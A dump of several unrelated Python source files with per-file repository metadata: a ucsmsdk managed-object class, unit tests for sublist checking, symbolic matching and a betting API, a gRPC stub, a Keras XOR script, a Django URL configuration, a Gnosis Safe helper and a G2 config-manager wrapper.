RMT_ERR_CODE_ERR_TACACS_PLUS_GET_ERROR = "ERR-tacacs-plus-get-error"
RMT_ERR_CODE_ERR_TACACS_SET_ERROR = "ERR-tacacs-set-error"
RMT_ERR_CODE_ERR_TEST_ERROR_1 = "ERR-test-error-1"
RMT_ERR_CODE_ERR_TEST_ERROR_2 = "ERR-test-error-2"
RMT_ERR_CODE_ERR_TIMEZONE_SET_ERROR = "ERR-timezone-set-error"
RMT_ERR_CODE_ERR_USER_ACCOUNT_EXPIRED = "ERR-user-account-expired"
RMT_ERR_CODE_ERR_USER_PASSWD_EXPIRED = "ERR-user-passwd-expired"
RMT_ERR_CODE_ERR_USER_SET_ERROR = "ERR-user-set-error"
RMT_ERR_CODE_ERR_XML_PARSE_ERROR = "ERR-xml-parse-error"
RMT_ERR_CODE_NONE = "none"
class IdentMetaSystemFsm(ManagedObject):
"""This is IdentMetaSystemFsm class."""
consts = IdentMetaSystemFsmConsts()
naming_props = set([])
mo_meta = MoMeta("IdentMetaSystemFsm", "identMetaSystemFsm", "fsm", VersionMeta.Version211a, "OutputOnly", 0xf, [], [""], ['identMetaSystem'], ['identMetaSystemFsmStage'], [None])
prop_meta = {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version211a, MoPropertyMeta.INTERNAL, None, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"completion_time": MoPropertyMeta("completion_time", "completionTime", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, r"""([0-9]){4}-([0-9]){2}-([0-9]){2}T([0-9]){2}:([0-9]){2}:([0-9]){2}((\.([0-9]){3})){0,1}""", [""], []),
"current_fsm": MoPropertyMeta("current_fsm", "currentFsm", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["nop", "sync", "ucscUnivSync"], []),
"descr": MoPropertyMeta("descr", "descr", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{0,256}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x2, 0, 256, None, [], []),
"fsm_status": MoPropertyMeta("fsm_status", "fsmStatus", "string", VersionMeta.Version211a, MoPropertyMeta.INTERNAL, None, None, None, None, ["fail", "inProgress", "nop", "pending", "skip", "success", "throttled"], []),
"instance_id": MoPropertyMeta("instance_id", "instanceId", "uint", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"progress": MoPropertyMeta("progress", "progress", "byte", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], ["0-100"]),
"rmt_err_code": MoPropertyMeta("rmt_err_code", "rmtErrCode", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["ERR-2fa-auth-retry", "ERR-ACTIVATE-failed", "ERR-ACTIVATE-in-progress", "ERR-ACTIVATE-retry", "ERR-BIOS-TOKENS-OLD-BIOS", "ERR-BIOS-TOKENS-OLD-CIMC", "ERR-BIOS-network-boot-order-not-found", "ERR-BOARDCTRLUPDATE-ignore", "ERR-DIAG-cancelled", "ERR-DIAG-fsm-restarted", "ERR-DIAG-test-failed", "ERR-DNLD-authentication-failure", "ERR-DNLD-hostkey-mismatch", "ERR-DNLD-invalid-image", "ERR-DNLD-no-file", "ERR-DNLD-no-space", "ERR-DNLD-usb-unmounted", "ERR-DNS-delete-error", "ERR-DNS-get-error", "ERR-DNS-set-error", "ERR-Diagnostics-in-progress", "ERR-Diagnostics-memtest-in-progress", "ERR-Diagnostics-network-in-progress", "ERR-FILTER-illegal-format", "ERR-FSM-no-such-state", "ERR-HOST-fru-identity-mismatch", "ERR-HTTP-set-error", "ERR-HTTPS-set-error", "ERR-IBMC-analyze-results", "ERR-IBMC-connect-error", "ERR-IBMC-connector-info-retrieval-error", "ERR-IBMC-fru-retrieval-error", "ERR-IBMC-invalid-end-point-config", "ERR-IBMC-results-not-ready", "ERR-MAX-subscriptions-allowed-error", "ERR-MO-CONFIG-child-object-cant-be-configured", "ERR-MO-META-no-such-object-class", "ERR-MO-PROPERTY-no-such-property", "ERR-MO-PROPERTY-value-out-of-range", "ERR-MO-access-denied", "ERR-MO-deletion-rule-violation", "ERR-MO-duplicate-object", "ERR-MO-illegal-containment", "ERR-MO-illegal-creation", "ERR-MO-illegal-iterator-state", "ERR-MO-illegal-object-lifecycle-transition", "ERR-MO-naming-rule-violation", "ERR-MO-object-not-found", "ERR-MO-resource-allocation", "ERR-NTP-delete-error", "ERR-NTP-get-error", "ERR-NTP-set-error", "ERR-POWER-CAP-UNSUPPORTED", "ERR-POWER-PROFILE-IN-PROGRESS", "ERR-SERVER-mis-connect", "ERR-SWITCH-invalid-if-config", "ERR-TOKEN-request-denied", "ERR-UNABLE-TO-FETCH-BIOS-SETTINGS", "ERR-UPDATE-failed", "ERR-UPDATE-in-progress", "ERR-UPDATE-retry", "ERR-aaa-config-modify-error", "ERR-acct-realm-set-error", "ERR-admin-passwd-set", "ERR-auth-issue", "ERR-auth-realm-get-error", "ERR-auth-realm-set-error", "ERR-authentication", "ERR-authorization-required", "ERR-cli-session-limit-reached", "ERR-create-keyring", "ERR-create-locale", "ERR-create-role", "ERR-create-tp", "ERR-create-user", "ERR-delete-locale", "ERR-delete-role", "ERR-delete-session", "ERR-delete-user", "ERR-downgrade-fail", "ERR-efi-Diagnostics--in-progress", "ERR-enable-mgmt-conn", "ERR-ep-set-error", "ERR-get-max-http-user-sessions", "ERR-http-initializing", "ERR-insufficiently-equipped", "ERR-internal-error", "ERR-ldap-delete-error", "ERR-ldap-get-error", "ERR-ldap-group-modify-error", "ERR-ldap-group-set-error", "ERR-ldap-set-error", "ERR-locale-set-error", "ERR-max-userid-sessions-reached", "ERR-missing-method", "ERR-modify-locale", "ERR-modify-role", "ERR-modify-user", "ERR-modify-user-locale", "ERR-modify-user-role", "ERR-provider-group-modify-error", "ERR-provider-group-set-error", "ERR-radius-get-error", "ERR-radius-global-set-error", "ERR-radius-group-set-error", "ERR-radius-set-error", "ERR-request-timeout", "ERR-reset-adapter", "ERR-role-set-error", "ERR-secondary-node", "ERR-service-not-ready", "ERR-session-cache-full", "ERR-session-not-found", "ERR-set-key-cert", "ERR-set-login-profile", "ERR-set-min-passphrase-length", "ERR-set-network", "ERR-set-password-strength-check", "ERR-set-port-channel", "ERR-store-pre-login-banner-msg", "ERR-tacacs-enable-error", "ERR-tacacs-global-set-error", "ERR-tacacs-group-set-error", "ERR-tacacs-plus-get-error", "ERR-tacacs-set-error", "ERR-test-error-1", "ERR-test-error-2", "ERR-timezone-set-error", "ERR-user-account-expired", "ERR-user-passwd-expired", "ERR-user-set-error", "ERR-xml-parse-error", "none"], ["0-4294967295"]),
"rmt_err_descr": MoPropertyMeta("rmt_err_descr", "rmtErrDescr", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"rmt_rslt": MoPropertyMeta("rmt_rslt", "rmtRslt", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, r"""((defaultValue|not-applicable|resource-unavailable|service-unavailable|intermittent-error|sw-defect|service-not-implemented-ignore|extend-timeout|capability-not-implemented-failure|illegal-fru|end-point-unavailable|failure|resource-capacity-exceeded|service-protocol-error|fw-defect|service-not-implemented-fail|task-reset|unidentified-fail|capability-not-supported|end-point-failed|fru-state-indeterminate|resource-dependency|fru-identity-indeterminate|internal-error|hw-defect|service-not-supported|fru-not-supported|end-point-protocol-error|capability-unavailable|fru-not-ready|capability-not-implemented-ignore|fru-info-malformed|timeout),){0,32}(defaultValue|not-applicable|resource-unavailable|service-unavailable|intermittent-error|sw-defect|service-not-implemented-ignore|extend-timeout|capability-not-implemented-failure|illegal-fru|end-point-unavailable|failure|resource-capacity-exceeded|service-protocol-error|fw-defect|service-not-implemented-fail|task-reset|unidentified-fail|capability-not-supported|end-point-failed|fru-state-indeterminate|resource-dependency|fru-identity-indeterminate|internal-error|hw-defect|service-not-supported|fru-not-supported|end-point-protocol-error|capability-unavailable|fru-not-ready|capability-not-implemented-ignore|fru-info-malformed|timeout){0,1}""", [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version211a, MoPropertyMeta.READ_WRITE, 0x8, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
}
prop_map = {
"childAction": "child_action",
"completionTime": "completion_time",
"currentFsm": "current_fsm",
"descr": "descr",
"dn": "dn",
"fsmStatus": "fsm_status",
"instanceId": "instance_id",
"progress": "progress",
"rmtErrCode": "rmt_err_code",
"rmtErrDescr": "rmt_err_descr",
"rmtRslt": "rmt_rslt",
"rn": "rn",
"sacl": "sacl",
"status": "status",
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.child_action = None
self.completion_time = None
self.current_fsm = None
self.descr = None
self.fsm_status = None
self.instance_id = None
self.progress = None
self.rmt_err_code = None
self.rmt_err_descr = None
self.rmt_rslt = None
self.sacl = None
self.status = None
ManagedObject.__init__(self, "IdentMetaSystemFsm", parent_mo_or_dn, **kwargs)
| 87.699531 | 3,753 | 0.756959 | [
"Apache-2.0"
] | CiscoUcs/ucsmsdk | ucsmsdk/mometa/ident/IdentMetaSystemFsm.py | 18,680 | Python |
import unittest
from sublist import check_lists, SUBLIST, SUPERLIST, EQUAL, UNEQUAL
class SublistTest(unittest.TestCase):
def test_unique_return_vals(self):
self.assertEqual(4, len(set([SUBLIST, SUPERLIST, EQUAL, UNEQUAL])))
def test_empty_lists(self):
self.assertEqual(EQUAL, check_lists([], []))
def test_empty_list_within(self):
self.assertEqual(SUBLIST, check_lists([], [1, 2, 3]))
def test_within_empty_list(self):
self.assertEqual(SUPERLIST, check_lists([1], []))
def test_equal_lists(self):
l1 = [0, 1, 2]
l2 = [0, 1, 2]
self.assertEqual(EQUAL, check_lists(l1, l2))
def test_different_lists(self):
l1 = list(range(1000000))
l2 = list(range(1, 1000001))
self.assertEqual(UNEQUAL, check_lists(l1, l2))
def test_false_start(self):
l1 = [1, 2, 5]
l2 = [0, 1, 2, 3, 1, 2, 5, 6]
self.assertEqual(SUBLIST, check_lists(l1, l2))
def test_consecutive(self):
l1 = [1, 1, 2]
l2 = [0, 1, 1, 1, 2, 1, 2]
self.assertEqual(SUBLIST, check_lists(l1, l2))
def test_sublist_at_start(self):
l1 = [0, 1, 2]
l2 = [0, 1, 2, 3, 4, 5]
self.assertEqual(SUBLIST, check_lists(l1, l2))
def test_sublist_in_middle(self):
l1 = [2, 3, 4]
l2 = [0, 1, 2, 3, 4, 5]
self.assertEqual(SUBLIST, check_lists(l1, l2))
def test_sublist_at_end(self):
l1 = [3, 4, 5]
l2 = [0, 1, 2, 3, 4, 5]
self.assertEqual(SUBLIST, check_lists(l1, l2))
def test_at_start_of_superlist(self):
l1 = [0, 1, 2, 3, 4, 5]
l2 = [0, 1, 2]
self.assertEqual(SUPERLIST, check_lists(l1, l2))
def test_in_middle_of_superlist(self):
l1 = [0, 1, 2, 3, 4, 5]
l2 = [2, 3]
self.assertEqual(SUPERLIST, check_lists(l1, l2))
def test_at_end_of_superlist(self):
l1 = [0, 1, 2, 3, 4, 5]
l2 = [3, 4, 5]
self.assertEqual(SUPERLIST, check_lists(l1, l2))
def test_large_lists(self):
l1 = list(range(1000)) * 1000 + list(range(1000, 1100))
l2 = list(range(900, 1050))
self.assertEqual(SUPERLIST, check_lists(l1, l2))
def test_spread_sublist(self):
multiples_of_3 = list(range(3, 200, 3))
multiples_of_15 = list(range(15, 200, 15))
self.assertEqual(UNEQUAL,
check_lists(multiples_of_15, multiples_of_3))
def test_avoid_sets(self):
self.assertEqual(UNEQUAL, check_lists([1, 3], [1, 2, 3]))
self.assertEqual(UNEQUAL, check_lists([1, 2, 3], [1, 3]))
self.assertEqual(UNEQUAL, check_lists([1, 2, 3], [3, 2, 1]))
if __name__ == '__main__':
unittest.main()
| 31.022727 | 75 | 0.586081 | [
"MIT"
] | KT12/Exercism | python/sublist/sublist_test.py | 2,730 | Python |
from sympycore import CollectingField as Algebra
Symbol = Algebra.Symbol
Number = Algebra.Number
Add = Algebra.Add
Mul = Algebra.Mul
Pow = Algebra.Pow
Terms = Algebra.Terms
Factors = Algebra.Factors
def test_symbol():
p = Symbol('p')
s = Symbol('s')
t = Symbol('t')
assert s.matches(s)=={}
assert s.matches(t)==None
assert s.matches(t,{},([s,],[True,]))=={s:t}
assert s.matches(t,{},([s,t],[True,True]))==None
def test_number():
s = Symbol('s')
n = Number(2)
assert n.matches(2)=={}
assert n.matches(3)==None
assert n.matches(s)==None
assert n.matches(s+2)==None
def test_wild():
w = Symbol('w')
s = Symbol('s')
wargs = [w],[True]
assert w.matches(Number(2),{},wargs)=={w:2}
assert w.matches(s,{},wargs)=={w:s}
assert w.matches(w,{},wargs)==None
assert w.matches(s+2,{},wargs)=={w:s+2}
assert w.matches(2*s,{},wargs)=={w:2*s}
assert w.matches(s**2,{},wargs)=={w:s**2}
def test_symbol():
s = Symbol('s')
assert s.matches(s)=={}
assert s.matches(2)==None
assert s.matches(2+s)==None
assert s.matches(2*s)==None
assert s.matches(s**2)==None
def test_term():
s = Symbol('s')
p = 2*s
assert p.matches(2*s)=={}
assert p.matches(3*s)==None
assert p.matches(s)==None
assert p.matches(Number(2))==None
assert p.matches(s**2)==None
def _test_wild_term():
w = Symbol('w')
p = 2*w
s = Symbol('s')
t = Symbol('t')
wargs = {},([w],[True])
assert p.matches(Number(1),*wargs)=={w:Number(1)/2}
assert p.matches(Number(2),*wargs)=={w:1}
assert p.matches(2*s,*wargs)=={w:s}
assert p.matches(3*s,*wargs)=={w:s*Number(3)/2}
assert p.matches(t*s,*wargs)=={w:t*s/2}
assert p.matches(s**2,*wargs)=={w:s**2/2}
m = p.matches(2*s+2,*wargs)
assert m is not None and m[w]==(2*(s+1))/2
assert p.matches(2*s+4,*wargs)=={w:(s+2)*2/2}
assert p.matches(2*s+5,*wargs)=={w:(2*s+Number(5))/2}
assert p.matches(2*s+t,*wargs)=={w:(2*s+t)/2}
assert p.matches(2*s-2*t,*wargs)=={w:(s-t)*2/2}
def _test_wild_symbol_term():
w = Symbol('w')
s = Symbol('s')
t = Symbol('t')
p = s+w
wargs = {},([w],[True])
assert p.matches(s+2,*wargs)=={w:2}
assert p.matches(t+2,*wargs)=={w:t+2-s}
def _test_wild_wild_term():
w1 = Symbol('w1')
w2 = Symbol('w2')
p = w1 + 2*w2
s = Symbol('s')
t = Symbol('t')
wargs = {},([w1,w2],[True,True])
assert p.matches(Number(2),*wargs) in [{w2:0,w1:2},{w2:1,w1:0}]
assert p.matches(2*s+t+2,*wargs) in [{w2:1+s,w1:t},{w1:2*s+t,w2:1},{w2:s,w1:t+2},
{w1:2+2*s, w2:t/2}]
def _test_wild_factor():
w = Symbol('w')
p = w**2
s = Symbol('s')
t = Symbol('t')
wargs = {},([w],[True])
#assert p.matches(Number(2),*wargs)=={w:Number(2)**(Number(1)/2)}
#assert p.matches(Number(4),*wargs)=={w:2}
#assert p.matches(Number(16),*wargs)=={w:4}
#assert p.matches(Number(9),*wargs)=={w:3}
#assert p.matches(Number(8),*wargs)=={w:2*Number(2)**(Number(1)/2)}
assert p.matches(s,*wargs)==None
assert p.matches(s**2,*wargs)=={w:s}
assert p.matches(s**3,*wargs)==None
#assert p.matches(s**4,*wargs)=={w:s**2}
assert p.matches(s+2,*wargs)==None
assert p.matches(s*2,*wargs)==None
assert p.matches(s**2*2,*wargs)==None
#assert p.matches(s**2*4,*wargs)=={w:2*s}
#assert p.matches(s**2*t**2,*wargs)=={w:s*t}
#assert p.matches(4*s**2*t**2,*wargs)=={w:2*s*t}
#assert p.matches(s**4*t**4,*wargs)=={w:(s*t)**2}
#assert p.matches(s**2*t**4,*wargs)=={w:s*t**2}
assert p.matches(s**2*t**3,*wargs)==None
#assert p.matches(s**2*t**-4,*wargs)=={w:s*t**-2}
def _test_wild_symbol_factor():
w = Symbol('w')
s = Symbol('s')
t = Symbol('t')
p = s*w
wargs = {},([w],[True])
assert p.matches(Number(1),*wargs)=={w:1/s}
assert p.matches(s,*wargs)=={w:1}
assert p.matches(2+t,*wargs)=={w:(2+t)/s}
def test_symbol2():
x = Symbol('x')
a,b,c,p,q = map(Symbol, 'abcpq')
e = x
assert e.match(x) == {}
assert e.match(a,a) == {a: x}
e = Number(5)
assert e.match(c,c) == {c: 5}
assert e.match(e) == {}
assert e.match(e+1) == None
def _test_add():
x,y,a,b,c = map(Symbol, 'xyabc')
p,q,r = map(Symbol, 'pqr')
e = a+b
assert e.match(p+b,p) == {p: a}
assert e.match(p+a,p) == {p: b}
e = 1+b
assert e.match(p+b,p) == {p: 1}
e = a+b+c
assert e.match(a+p+c,p) == {p: b}
assert e.match(b+p+c,p) == {p: a}
e = a+b+c+x
assert e.match(a+p+x+c,p) == {p: b}
assert e.match(b+p+c+x,p) == {p: a}
assert e.match(b) == None
assert e.match(b+p,p) == {p: a+c+x}
assert e.match(a+p+c,p) == {p: b+x}
assert e.match(b+p+c,p) == {p: a+x}
e = 4*x+5
assert e.match(3*x+p,p) == {p: x+5}
assert e.match(4*x+p,(p,lambda expr: not expr.args)) == {p: 5}
assert e.match(p*x+5,(p,lambda expr: not expr.args)) == {p: 4}
assert e.match(p*x+q,(p,lambda expr: not expr.args),(q,lambda expr: not expr.args)) == {p: 4, q: 5}
e = 4*x+5*y+6
assert e.match(p*x+q*y+r,(p,lambda expr: not expr.args),
(q,lambda expr: not expr.args),
(r,lambda expr: not expr.args)) == {p: 4, q: 5, r: 6}
| 29.427778 | 103 | 0.537474 | [
"Apache-2.0"
] | 1zinnur9/pymaclab | sympycore/basealgebra/tests/test_matches.py | 5,297 | Python |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.ads.google_ads.v2.proto.resources import feed_item_target_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_feed__item__target__pb2
from google.ads.google_ads.v2.proto.services import feed_item_target_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2
class FeedItemTargetServiceStub(object):
"""Proto file describing the FeedItemTarget service.
Service to manage feed item targets.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetFeedItemTarget = channel.unary_unary(
'/google.ads.googleads.v2.services.FeedItemTargetService/GetFeedItemTarget',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.GetFeedItemTargetRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_feed__item__target__pb2.FeedItemTarget.FromString,
)
self.MutateFeedItemTargets = channel.unary_unary(
'/google.ads.googleads.v2.services.FeedItemTargetService/MutateFeedItemTargets',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.MutateFeedItemTargetsRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.MutateFeedItemTargetsResponse.FromString,
)
class FeedItemTargetServiceServicer(object):
"""Proto file describing the FeedItemTarget service.
Service to manage feed item targets.
"""
def GetFeedItemTarget(self, request, context):
"""Returns the requested feed item targets in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateFeedItemTargets(self, request, context):
"""Creates or removes feed item targets. Operation statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_FeedItemTargetServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetFeedItemTarget': grpc.unary_unary_rpc_method_handler(
servicer.GetFeedItemTarget,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.GetFeedItemTargetRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_feed__item__target__pb2.FeedItemTarget.SerializeToString,
),
'MutateFeedItemTargets': grpc.unary_unary_rpc_method_handler(
servicer.MutateFeedItemTargets,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.MutateFeedItemTargetsRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.MutateFeedItemTargetsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.FeedItemTargetService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| 50.826087 | 176 | 0.823211 | [
"Apache-2.0"
] | BenRKarl/google-ads-python | google/ads/google_ads/v2/proto/services/feed_item_target_service_pb2_grpc.py | 3,507 | Python |
# !/usr/bin/env python
# -*- coding: utf-8 -*-
"""Default module to train a xor classifier and write weights to disk."""
from keras.models import Sequential
from keras.layers.core import Dense, Activation
import keras.optimizers as kop
import numpy as np
import os
from sklearn.preprocessing import StandardScaler
try:
import cPickle as pickle
except Exception as ex:
import pickle
def check_dir_exists(dirname='./pickles'):
"""Check if given dirname exists This will contain all the pickle files."""
if not os.path.exists(dirname):
print("Directory to store pickes does not exist. Creating one now: ./pickles")
os.mkdir(dirname)
def save_x_y_scalar(X_train, Y_train):
"""Use a normalization method on your current dataset and save the coefficients.
Args:
X_train: Input X_train
Y_train: Lables Y_train
Returns:
Normalized X_train,Y_train ( currently using StandardScaler from scikit-learn)
"""
scalar_x = StandardScaler()
X_train = scalar_x.fit_transform(X_train)
scalar_y = StandardScaler()
Y_train = scalar_y.fit_transform(Y_train)
print('dumping StandardScaler objects ..')
pickle.dump(scalar_y,
open('pickles/scalar_y.pickle', "wb"),
protocol=pickle.HIGHEST_PROTOCOL)
pickle.dump(scalar_x,
open('pickles/scalar_x.pickle', "wb"),
protocol=pickle.HIGHEST_PROTOCOL)
return X_train, Y_train
def create_model(X_train, Y_train):
"""create_model will create a very simple neural net model and save the weights in a predefined directory.
Args:
X_train: Input X_train
Y_train: Lables Y_train
"""
xin = X_train.shape[1]
model = Sequential()
model.add(Dense(units=4, input_shape=(xin, )))
model.add(Activation('tanh'))
model.add(Dense(4))
model.add(Activation('linear'))
model.add(Dense(1))
rms = kop.RMSprop()
print('compiling now..')
model.compile(loss='mse', optimizer=rms)
model.fit(X_train, Y_train, epochs=1000, batch_size=1, verbose=2)
score = model.evaluate(X_train, Y_train, batch_size=1)
print("Evaluation results:", score)
open('pickles/my_model_architecture.json', 'w').write(model.to_json())
print("Saving weights in: ./pickles/my_model_weights.h5")
model.save_weights('pickles/my_model_weights.h5')
if __name__ == '__main__':
X_train = np.array([[1., 1.], [1., 0], [0, 1.], [0, 0]])
Y_train = np.array([[0.], [1.], [1.], [0.]])
check_dir_exists(dirname='./pickles')
X_train, Y_train = save_x_y_scalar(X_train, Y_train)
create_model(X_train, Y_train)
| 31.05814 | 111 | 0.671659 | [
"MIT"
] | ansrivas/keras-rest-server | createpickles.py | 2,671 | Python |
from __future__ import absolute_import, unicode_literals
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import TemplateView
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^', TemplateView.as_view(template_name='base.html'), name='home'),
]
| 29.272727 | 76 | 0.76087 | [
"BSD-3-Clause"
] | JostCrow/django-maintenance-window | tests/urls.py | 322 | Python |
import datetime
import unittest
import unittest.mock as mock
from betdaq.apiclient import APIClient
from betdaq.endpoints.account import Account
class AccountTest(unittest.TestCase):
def setUp(self):
client = APIClient('username', 'password')
self.account = Account(client)
@mock.patch('betdaq.endpoints.account.Account.process_response')
@mock.patch('betdaq.endpoints.account.Account.request', return_value=mock.Mock())
def test_get_account_balances(self, mock_request, mock_process_response):
self.account.get_account_balances()
mock_request.assert_called_once_with('GetAccountBalances', {}, secure=True)
assert mock_process_response.call_count == 1
@mock.patch('betdaq.endpoints.account.Account.process_response')
@mock.patch('betdaq.endpoints.account.Account.request', return_value=mock.Mock())
def test_get_account_transactions(self, mock_request, mock_process_response):
self.account.get_account_transactions(StartTime=datetime.datetime(2017, 1, 1).timestamp(),
EndTime=datetime.datetime(2017, 1, 10).timestamp())
mock_request.assert_called_once_with(
'ListAccountPostings', {'StartTime': 1483228800.0, 'EndTime': 1484006400.0}, secure=True
)
assert mock_process_response.call_count == 1
@mock.patch('betdaq.endpoints.account.Account.process_response')
@mock.patch('betdaq.endpoints.account.Account.request', return_value=mock.Mock())
def test_get_account_transactions_by_id(self, mock_request, mock_process_response):
self.account.get_account_transactions_by_id(TransactionId=1)
mock_request.assert_called_once_with('ListAccountPostingsById', {'TransactionId': 1}, secure=True)
assert mock_process_response.call_count == 1
@mock.patch('betdaq.endpoints.account.Account.process_response')
@mock.patch('betdaq.endpoints.account.Account.request', return_value=mock.Mock())
def test_change_account_password(self, mock_request, mock_process_response):
self.account.change_account_password(Password='new_password')
mock_request.assert_called_once_with('ChangePassword', {'Password': 'new_password'}, secure=True)
assert mock_process_response.call_count == 1
| 46.04 | 106 | 0.742398 | [
"MIT"
] | ScoreX/betdaq | tests/test_account.py | 2,302 | Python |
from brownie import *
from helpers.constants import AddressZero
from helpers.registry import registry
from dotmap import DotMap
def connect_gnosis_safe(address):
return Contract.from_abi(
"GnosisSafe", address, registry.gnosis_safe.artifacts.GnosisSafe["abi"],
)
class GnosisSafeSystem:
def __init__(self):
self.masterCopy = Contract.from_abi(
"GnosisSafe",
web3.toChecksumAddress(registry.gnosis_safe.addresses.masterCopy),
registry.gnosis_safe.artifacts.GnosisSafe["abi"],
)
self.proxyFactory = Contract.from_abi(
"ProxyFactory",
web3.toChecksumAddress(registry.gnosis_safe.addresses.proxyFactory),
registry.gnosis_safe.artifacts.ProxyFactory["abi"],
)
def deployGnosisSafe(self, params, signer):
encodedParams = self.masterCopy.setup.encode_input(
params.owners,
params.threshold,
params.to,
params.data,
params.fallbackHandler,
params.paymentToken,
params.payment,
params.paymentReceiver,
)
tx = self.proxyFactory.createProxy(
self.masterCopy, encodedParams, {"from": signer}
)
return Contract.from_abi(
"GnosisSafe",
tx.events["ProxyCreation"][0]["proxy"],
registry.gnosis_safe.artifacts.GnosisSafe["abi"],
)
| 30.041667 | 80 | 0.627601 | [
"MIT"
] | EchoDao-BSC/badger-system | scripts/systems/gnosis_safe_system.py | 1,442 | Python |
from ctypes import *
import threading
import json
import os
import arcpy
class MyBuffer(threading.local):
def __init__(self):
self.buf = create_string_buffer(65535)
self.bufSize = sizeof(self.buf)
#arcpy.AddMessage("Created new Buffer {}".format(self.buf))
tls_var = MyBuffer()
from .G2Exception import TranslateG2ModuleException, G2ModuleNotInitialized, G2ModuleGenericException
def resize_return_buffer(buf_, size_):
""" callback function that resizes return buffer when it is too small
Args:
size_: size the return buffer needs to be
"""
try:
if not tls_var.buf:
#arcpy.AddMessage("New RESIZE_RETURN_BUF {}:{}".format(buf_,size_))
tls_var.buf = create_string_buffer(size_)
tls_var.bufSize = size_
elif (tls_var.bufSize < size_):
#arcpy.AddMessage("RESIZE_RETURN_BUF {}:{}/{}".format(buf_,size_,tls_var.bufSize))
foo = tls_var.buf
tls_var.buf = create_string_buffer(size_)
tls_var.bufSize = size_
memmove(tls_var.buf, foo, sizeof(foo))
except AttributeError:
#arcpy.AddMessage("AttributeError RESIZE_RETURN_BUF {}:{}".format(buf_,size_))
tls_var.buf = create_string_buffer(size_)
#arcpy.AddMessage("Created new Buffer {}".format(tls_var.buf))
tls_var.bufSize = size_
return addressof(tls_var.buf)
class G2ConfigMgr(object):
"""G2 config-manager module access library
Attributes:
_lib_handle: A boolean indicating if we like SPAM or not.
_resize_func_def: resize function definiton
_resize_func: resize function pointer
_module_name: CME module name
_ini_params: a JSON string containing INI parameters
"""
def initV2(self, module_name_, ini_params_, debug_=False):
""" Initializes the G2 config manager
This should only be called once per process.
Args:
moduleName: A short name given to this instance of the config module
iniParams: A json document that contains G2 system parameters.
verboseLogging: Enable diagnostic logging which will arcpy.AddMessage a massive amount of information to stdout
"""
self._module_name = self.prepareStringArgument(module_name_)
self._ini_params = self.prepareStringArgument(ini_params_)
self._debug = debug_
if self._debug:
arcpy.AddMessage("Initializing G2 Config Manager")
self._lib_handle.G2ConfigMgr_init_V2.argtypes = [c_char_p, c_char_p, c_int]
ret_code = self._lib_handle.G2ConfigMgr_init_V2(self._module_name,
self._ini_params,
self._debug)
if self._debug:
arcpy.AddMessage("Initialization Status: " + str(ret_code))
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
def __init__(self):
# type: () -> None
""" Class initialization
"""
try:
if os.name == 'nt':
self._lib_handle = cdll.LoadLibrary("G2.dll")
else:
self._lib_handle = cdll.LoadLibrary("libG2.so")
except OSError as ex:
arcpy.AddMessage("ERROR: Unable to load G2. Did you remember to setup your environment by sourcing the setupEnv file?")
